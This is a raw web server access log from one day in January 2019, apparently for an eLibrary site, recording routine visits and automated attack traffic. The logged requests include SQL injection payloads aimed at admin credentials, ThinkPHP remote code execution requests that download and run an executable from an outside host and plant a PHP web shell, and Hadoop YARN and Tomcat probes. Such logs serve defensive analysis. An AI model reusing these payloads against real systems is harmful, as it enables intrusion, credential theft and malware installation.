127.0.0.1 - - [11/Jan/2019:00:46:20 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:01:06:56 -0500] "HEAD / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:01:06:56 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:01:06:56 -0500] "HEAD /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20%7Bprefix%7Duser HTTP/1.1" 200 - 127.0.0.1 - - [11/Jan/2019:01:06:56 -0500] "GET /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20%7Bprefix%7Duser HTTP/1.1" 200 2137 127.0.0.1 - - [11/Jan/2019:01:06:57 -0500] "HEAD /plus/recommend.php HTTP/1.1" 200 - 127.0.0.1 - - [11/Jan/2019:01:06:57 -0500] "GET /plus/recommend.php?aid=1&_FILES%5Btype%5D%5Bname%5D&_FILES%5Btype%5D%5Bsize%5D&_FILES%5Btype%5D%5Btype%5D&_FILES%5Btype%5D%5Btmp_name%5D=aa%5C%27and+char(@%60%27%60)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x383839386739617364,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20%60%23@__admin%60%23 HTTP/1.1" 200 2137 127.0.0.1 - - [11/Jan/2019:01:06:57 -0500] "HEAD /plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a HTTP/1.1" 200 - 127.0.0.1 - - [11/Jan/2019:01:06:57 -0500] "GET /plus/search.php?keyword=as&typeArr%5B111%3D@%60%5C%5C%5C'%60)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C%5C%5C'%60+%5D=a HTTP/1.1" 200 2137 127.0.0.1 - - [11/Jan/2019:01:06:58 -0500] "HEAD /news/html HTTP/1.1" 200 - 127.0.0.1 - - [11/Jan/2019:01:06:58 -0500] "GET /news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html HTTP/1.1" 200 2137 209.17.97.34 - - [11/Jan/2019:01:18:42 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:01:29:32 -0500] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:01:29:32 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:01:29:37 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:01:42:16 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:01:42:16 -0500] "GET /login HTTP/1.1" 200 4162 5.101.1.201 - - [11/Jan/2019:02:28:30 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:02:28:30 -0500] "GET /login HTTP/1.1" 200 4162 54.91.177.35 - - [11/Jan/2019:02:41:22 -0500] "GET /ws/v1/cluster HTTP/1.1" 200 2137 54.91.177.35 - - [11/Jan/2019:02:41:22 -0500] "GET / HTTP/1.1" 302 - 209.17.97.90 - - [11/Jan/2019:03:01:01 -0500] "GET / HTTP/1.1" 302 - 209.17.96.218 - - [11/Jan/2019:03:17:23 -0500] "GET / HTTP/1.1" 302 - 209.17.97.34 - - [11/Jan/2019:03:29:47 -0500] "GET / HTTP/1.1" 302 - 209.17.97.50 - - [11/Jan/2019:03:44:35 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:04:20:24 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:04:20:24 -0500] "GET /login HTTP/1.1" 200 4162 209.17.96.210 - - [11/Jan/2019:04:43:02 -0500] "GET / HTTP/1.1" 302 - 185.209.0.12 - - [11/Jan/2019:05:28:59 -0500] "/*àCookie: mstshash=Administr " 400 - 209.17.96.234 - - [11/Jan/2019:06:21:52 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:06:34:04 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:06:34:04 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:07:03:24 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:07:03:25 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /css/new-style.css HTTP/1.1" 200 5551 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /images/elibrary2.png HTTP/1.1" 200 137532 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 200 12921 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990 127.0.0.1 - - [11/Jan/2019:07:03:26 -0500] "GET /images/bg.png HTTP/1.1" 200 166566 127.0.0.1 - - [11/Jan/2019:07:03:27 -0500] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990 127.0.0.1 - - [11/Jan/2019:07:03:27 -0500] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990 127.0.0.1 - - [11/Jan/2019:07:03:29 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150 209.17.96.66 - - [11/Jan/2019:07:23:17 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:08:08:05 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:08:08:05 -0500] "GET /login HTTP/1.1" 200 4162 5.101.1.201 - - [11/Jan/2019:08:46:53 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:08:46:53 -0500] "GET /login HTTP/1.1" 200 4162 5.101.1.201 - - [11/Jan/2019:09:50:06 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:09:50:06 -0500] "GET /login HTTP/1.1" 200 4162 125.64.94.200 - - [11/Jan/2019:10:04:02 -0500] "GET / HTTP/1.0" 302 - 209.17.96.234 - - [11/Jan/2019:11:04:05 -0500] "GET / HTTP/1.1" 302 - 209.17.97.122 - - [11/Jan/2019:12:02:15 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:12:17:56 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:12:17:56 -0500] "GET /login HTTP/1.1" 200 4162 5.101.1.201 - - [11/Jan/2019:13:52:46 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:13:52:46 -0500] "GET /login HTTP/1.1" 200 4162 45.55.35.206 - - [11/Jan/2019:15:18:09 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 5.101.1.201 - - [11/Jan/2019:15:18:58 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:15:18:58 -0500] "GET /login HTTP/1.1" 200 4162 209.17.97.98 - - [11/Jan/2019:15:19:13 -0500] "GET / HTTP/1.1" 302 - 209.17.96.58 - - [11/Jan/2019:15:30:05 -0500] "GET / HTTP/1.1" 302 - 45.55.35.206 - - [11/Jan/2019:15:33:57 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 209.17.97.90 - - [11/Jan/2019:15:45:53 -0500] "GET / HTTP/1.1" 302 - 45.55.35.206 - - [11/Jan/2019:15:46:06 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 209.17.97.18 - - [11/Jan/2019:16:04:44 -0500] "GET / HTTP/1.1" 302 - 45.55.35.206 - - [11/Jan/2019:16:08:05 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 209.17.97.114 - - [11/Jan/2019:16:10:12 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:16:13:12 -0500] "GET / HTTP/1.1" 302 - 45.55.35.206 - - [11/Jan/2019:16:20:32 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 5.101.1.201 - - [11/Jan/2019:16:27:14 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:16:27:14 -0500] "GET /login HTTP/1.1" 200 4162 209.17.97.66 - - [11/Jan/2019:16:37:26 -0500] "GET / HTTP/1.1" 302 - 209.17.97.122 - - [11/Jan/2019:16:41:11 -0500] "GET / HTTP/1.1" 302 - 185.244.25.130 - - [11/Jan/2019:16:47:38 -0500] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [11/Jan/2019:17:35:25 -0500] "GET /wp-login.php HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:17:35:26 -0500] "GET /wp-login.php HTTP/1.1" 302 - 118.249.187.130 - - [11/Jan/2019:17:43:30 -0500] "GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 200 2137 118.249.187.130 - - [11/Jan/2019:17:43:30 -0500] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php HTTP/1.1" 200 2137 118.249.187.130 - - [11/Jan/2019:17:43:30 -0500] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 200 2137 5.101.1.201 - - [11/Jan/2019:18:48:15 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:18:48:15 -0500] "GET /login HTTP/1.1" 200 4162 209.17.97.98 - - [11/Jan/2019:18:50:05 -0500] "GET / HTTP/1.1" 302 - 209.17.96.58 - - [11/Jan/2019:18:52:18 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:18:54:19 -0500] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:18:54:19 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:19:15:40 -0500] "GET /forgotPasswordLink HTTP/1.1" 200 3711 209.17.97.82 - - [11/Jan/2019:19:37:10 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:19:52:14 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:19:52:14 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:20:20:09 -0500] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:20:20:09 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:20:20:09 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:20:20:09 -0500] "GET /login HTTP/1.1" 200 4162 209.17.96.226 - - [11/Jan/2019:20:34:28 -0500] "GET / HTTP/1.1" 302 - 209.17.96.194 - - [11/Jan/2019:20:35:45 -0500] "GET / HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:20:53:03 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:20:53:03 -0500] "GET /login HTTP/1.1" 200 4162 209.17.96.50 - - [11/Jan/2019:21:14:38 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:21:41:38 -0500] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:21:41:39 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:21:41:42 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:21:41:46 -0500] "GET /login HTTP/1.1" 200 4162 5.101.1.201 - - [11/Jan/2019:22:07:33 -0500] "GET /conf HTTP/1.1" 302 - 5.101.1.201 - - [11/Jan/2019:22:07:33 -0500] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [11/Jan/2019:22:10:20 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [11/Jan/2019:22:10:20 -0500] "GET /login HTTP/1.1" 200 4162 209.17.97.42 - - [11/Jan/2019:22:22:09 -0500] "GET / HTTP/1.1" 302 - 209.17.96.26 - - [11/Jan/2019:22:23:13 -0500] "GET / HTTP/1.1" 302 - 117.3.69.247 - - [11/Jan/2019:23:02:47 -0500] "GET /manager/html HTTP/1.1" 401 2538 117.3.69.247 - - [11/Jan/2019:23:02:47 -0500] "GET /manager/html HTTP/1.1" 401 2538 117.3.69.247 - - [11/Jan/2019:23:02:47 -0500] "GET /manager/html HTTP/1.1" 401 - 127.0.0.1 - - [11/Jan/2019:23:23:00 -0500] "POST /login/xmlrpc.php HTTP/1.1" 200 2137 127.0.0.1 - - [11/Jan/2019:23:23:01 -0500] "POST /login/xmlrpc.php HTTP/1.1" 200 2137 209.17.97.90 - - [11/Jan/2019:23:53:48 -0500] "GET / HTTP/1.1" 302 -